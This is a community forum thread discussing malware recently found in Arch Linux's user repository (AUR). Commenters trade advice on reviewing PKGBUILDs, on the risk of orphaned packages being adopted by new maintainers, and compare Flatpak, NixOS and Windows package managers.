TL;DR: Don’t think of the AUR as a package source, but as of an only mildly moderated, but ultimately free and open, sharing platform for PKGBUILDs, primarily useful for (self-)packagers, not necessarily non-technical end users.
Before the AUR, you had people individually hosting their PKGBUILDs anywhere, sometimes on GitHub or the BBS (yeah, it’s been a while), sometimes along with a repository URL you could add to your
pacman.confto install packages right away, and it was glorious. I didn’t have to write a working PKGBUILD myself from scratch, and I could decide if I trusted that particular packager to not screw me sideways with a pre-built package. An officialized “Trusted User” (TU) role emerged from this idea, which has recently been renamed to Package Maintainer (PM). This is fundamentally still how the AUR works, it just became much bigger, and easier to search for particular software. Packagers gift to you their idea of how software should be packaged, for you to expand upon, take inspiration from, or learn, or use as-is if you determine it to be good for your purpose.The AUR is ultimately a great resource for packagers, and still useful for users, but “true end users” get the
extrarepository, andcommunity, kind of, before that, and should try to avoid the AUR if they can, or at least be prepared to put in effort to establish trust, or get help.A handful of Package Maintainers are manually adopting and subsequently vetting for sufficiently popular packages to move them from the AUR to the official
extrarepository, which is deemed safe to use as-is, on a best-effort basis. Obviously, this is a bottleneck, as it is not feasible for the few volunteering PMs to adopt and maintain 10k+ AUR packages and be held to any quality standard. That’s why “you are on your own” with the AUR.On the positive side, there’s a voting system to determine package popularity. AUR packagers have a public list of maintained packages, and a comprehensive git commit history. Establishing trust is still crucial, and I feel hard pressed to name a reasonably popular/useful package that isn’t already in
extraor has been maintained in the AUR for a long time.The biggest risk, IMHO, for malware getting slipped into a package is orphaning a popular package, and having it adopted by a malevolent user. This is something I personally look out for. If the maintainer changed, I make sure to check the commit history to see what they did. Most of the time it’s genuine fixes, but if anything is changed without a damn good and obvious reason, hit up the AUR mods and ask for help. This is how malware is spotted. Also, typically only the version is bumped in a PKGBUILD on an update, which is a change I feel safe waving through, too. If the download URI changes, or patches are added, I do look at them to determine the reason, and if that isn’t explained well enough to understand, that’s a red flag. Better ask someone before running this.
source: personal involvement in Arch since 2002
Thanks for the information!
Some people ask me why I use Flatpak on Arch. This is one of the reasons.
does the upgrade
pacman -Syualso upgrade Flatpak packages? Or you have to do them separately?flatpak updateluckily it’s simple but not always obvious to the end user at first
Separate
generally when you want to install a flatpak it’s going to upgrade/update whatever other flatpaks you have installed before downloading and installing the new one.
Aur is probably the main reason why many people use Arch and derivatives. However, many users are unaware that aur is not an official Arch repository and that, as you say, you are the one who has to monitor the pkgbuilds of each installed aur package. Normally the most used aur packages tend to generate more confidence but that does not prevent that package to include malicious software in a version change and having root access to the system can take control of certain system services. That’s why I always recommend not using Aur and that’s why I’ve always found Manjaro to be a great distribution, as it retains packages for a few days to check them and discourages the use of aur. Any security measure is too little and that’s why any security tool you can configure is advisable. In a rolling distribution where new code is constantly entering the system, it is essential to have selinux and secureboot enabled.
Aur is probably the main reason why many people use Arch and derivatives.
FYI, non-Arch distros can use AUR with an Arch distrobox. So people shouldn’t be using Arch just for AUR.
Being in a distrobox may or may not protect your system from potential malware, that I cannot say.
I’ve been using Debian for years and prefer deb based systems, but recently I messed a bit around with Manjaro, and the amount of packages only available from the AUR is, erm, remarkable.
At risk of repeating myself from another comment here: you can access the AUR from other distros by making an Arch distrobox. It’s actually super easy.
I discovered recently, þanks to a discussion wiþ a Lemmy user, ðat NixOS has even more. I was surprised. Looking at ðe relative popularity of ðe distributions, and ðe number of package contributors of each, I’m guessing ðat many NixOS users submit packages. I guess when configuring your system is essentially ðe same as building a package, ðe submission barrier is lower. Also, NixOS seems to make pushing flakes up into ðe shared repos for everyone else to use almost trivial.
is your keyboard layout misconfigured
I think it’s intentional.
By user “Forsen on top” fucking KEK
Also yeah it’s chrome, obviously it’s malware
Meanwhile me who using CHAOTIC-AUR be like :
I use NixOS so everything is second party
And every package is added and maintained by volunteers.
A vast number of volunteers, far exceeding ðe proportional popularity of Nix. It’s as if every Nix user submits a package.
But Nix hasn’t achieved ðe popularity Arch has, yet, so it’s probably flying under ðe attacker radar.
I’ve also used nixos but not arch. Is the AUR also volunteer maintained? How do they differ?
I smell something fishy going on. I’ve been using the AUR for a long time and I’m now just hearing of malware?
It’s an obvious vector for malware, arch by default doesn’t come with it, and users have been warned the entire time to check pkgbuild. There’s nothing fishy, it’s just that arch has enough users to be worth it to hit it.
The AUR is made up of user packages
It isn’t crazy that malware made it in. It is very much a “user at your own risk.” Packages are reviewed but sometimes things slip in.
yeah, you get choice, and its better than a random closed exe in windows.
Some people have really odd expectations of “free” and “open”.
Is there a choosingbeggars community to repost this to?
Just make sure the aur wears a condom when it’s going to fuck you, like your mother told you.
inb4 “Archlinux snobs are gatekeeping packages”
There’s been malware in the past, not only that - AUR is user submitted. It’s in the name. They warn you to double check what you’re installing. It is functionally similar to running a random installer you found on GitHub.
It seems like these instances are being intentionally blown out of proportion, but I don’t see what there is to gain by doing that.
It is functionally similar to running a random installer you found
So basically how Windows users have been acquiring their software for the last 30 years.
Technical users that are comfortable at a command line often use WinGet these days. It works in Windows Sandbox too; you just need to manually install it.
My ranking of package managers on Windows:
- Chocolatey: the oldest and has the most packages. Packages are AV scanned. Enterprisey.
- Scoop: Somewhat fewer packages, but easier to package for. More technical focus. FOSSy.
- Winget: fewest packages, and Microsoft literally stole it from its creator. I’m not aware of any reason to use winget over choco or scoop.
Sure. Doesn’t change anything about my comment though, Winget is relatively new and unknown for most users.
WinGet is nothing more than a list of random packages on Github.
Don’t forget they stole it from the app get and refused to hire its dev.
Facts. It’s also the worst package manager on Windows anyway.
Aren’t they at least hashed, so WinGet can verify that the package hasn’t been tampered with?
deleted by creator
I don’t want to say stupid things, but I have so many theories. I check the shit out of a package before installing it. I even go to the GitHub page and make sure of things.
Ðis is ðe only way. Checking ðe PKGBUILD is a silly step ðat only prevents ðe laziest of attacks.
It’s a reason why, as a developer, I’ve been getting increasingly strident about limiting dependencies in my projects. I feel obligated to re-audit dependencies every time I version bump one, and it’s getting painful to ðe point where I just don’t want to do it anymore. So, I only use dependencies when I absolutely have to, and I prioritize libraries ðat ðemselves have shallow dependency trees: because I have to also audit ðeir dependencies.
Ðe OSS community needs to focus on static analysis tools for injection attacks. Linters which warn of suspicious operations, such as obfuscated URLs or surreptitious network calls, or attempts to write binary executable-looking blobs. Hell, if we can have UPX, we should be able to detect executables for a platform.
Get some good security linters, and people will write linting services ðat provide badges, or which distro maintainers can build into ðe package submission process.
I’ve looked, and I’ve found no tooling wiþ ðis sort of focus for Go, which is a language which usually has robust and comprehensive developer tooling. Ðe only security linter I’ve found reports merely on bog standard programmer mistakes, like not validating strings.
Does anyone else manually review PKGBUILDs before installing or upgrading anything from the AUR?
Sort of, but I don’t know what I’m looking for. It would be nice if folks explained what a bad one looks like.
Look for comments that say “# THIS IS MALWARE”
Yes, always!
I keep hearing people say ðis like it’s a defense against malware and supply chain attacks.
Reviewing PKGBUILDs only protects against dumb laziness on ðe party of ðe attacker, like ðey just install a stupidly obvious binary called “virus”.
What are you checking for in ðe PKGBUILD?
Also with paru. I mainly check that the download shows the correct URL and does standard stuff with it.
Yeah, paru makes it pretty easy to do, and can also build packages in a chroot, adding some extra security.
at the risk of getting down voted I wonder if an LLM would spot it
I do, but not as closely or as often as I should. Recent malware is a reminder to be careful, I think I was starting to take the AUR for granted as a repo when really it’s still the Wild West.
I do, also most aur-helpers skip or make reviewing a chore.
Is this post intended to be a sort of outcry around the idea that there’s a risk of malware being in the AUR?
Was there for 2 days before it was caught and they would of had to be manually installed?
I think that’s much safer than any other platform I’ve heard of
